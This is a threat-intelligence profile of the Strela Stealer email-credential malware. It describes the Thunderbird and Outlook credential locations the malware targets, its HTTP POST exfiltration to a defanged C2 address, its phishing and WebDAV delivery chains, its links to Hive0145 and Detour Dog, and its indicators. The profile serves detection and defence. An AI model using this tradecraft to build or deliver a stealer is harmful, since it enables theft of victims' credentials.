Strela Stealer

Strela Stealer is an information-stealing malware family focused on harvesting email client credentials, specifically from Microsoft Outlook and Mozilla Thunderbird. Reported theft includes Thunderbird credentials from %APPDATA%\Thunderbird\Profiles\logins.json and key4.db, and Outlook IMAP credentials from registry locations, with password decryption via CryptUnprotectData(). IBM X-Force reported exfiltration over HTTP POST to a hardcoded C2 endpoint at http://94.159.113[.]48/server.php, with repeated transmission attempts until a stop string such as "KH," "ANTIROK," or "CHOLLIMA" is received.

The malware is associated with the financially motivated threat actor Hive0145, which IBM assessed may be the sole operator and likely functions as an initial access broker. Campaigns have targeted victims across Europe since at least late 2022, with reporting specifically naming Spain, Germany, Ukraine, Austria, Liechtenstein, Luxembourg, and Switzerland. Trustwave SpiderLabs and IBM both described targeting of Outlook and Thunderbird users, and Proton66-hosted infrastructure was reported as being used to distribute Strela Stealer in early 2025.

Observed delivery is primarily phishing-based. Hive0145 used invoice and receipt lures, including authentic stolen invoice emails whose attachments were replaced with malicious payloads while preserving the original email content and filename pattern. Infection chains included archives containing heavily obfuscated JavaScript downloaders that retrieved and executed crypted Strela Stealer DLLs, often via WebDAV and rundll32.exe. Earlier campaigns used polyglot files, encrypted ZIP archives with per-email passwords, uncommon executable extensions such as .com and .pif, valid code-signing certificates, and a custom crypter/loader referred to as Stellar Crypter or Stellar Loader, which decrypts and executes the payload in memory. Recent variants reportedly added host profiling via systeminfo output and installed-application enumeration, along with expanded language and locale checks.

Strela Stealer has also been distributed through infrastructure operated by Detour Dog, which Infoblox described as a service provider or partner rather than the malware operator. Detour Dog used compromised WordPress sites, DNS TXT-record-based command and control, and a first-stage backdoor/reverse shell called StarFish to facilitate delivery. Infoblox reported Base64-encoded TXT responses containing the word "down" to trigger remote file execution behavior on infected sites, which then retrieved content from verified Strela Stealer C2 infrastructure. Spam delivery in these campaigns was linked to REM Proxy and Tofsee botnets, while Detour Dog hosted much of the first-stage infrastructure.

High-confidence infrastructure and indicators mentioned in the content include the Strela Stealer C2 endpoint 94.159.113[.]48/server.php, WebDAV delivery from 94.159.113.48:8888, and Detour Dog sinkholed C2 domains webdmonitor[.]io and aeroarrows[.]io associated with Strela-related delivery operations.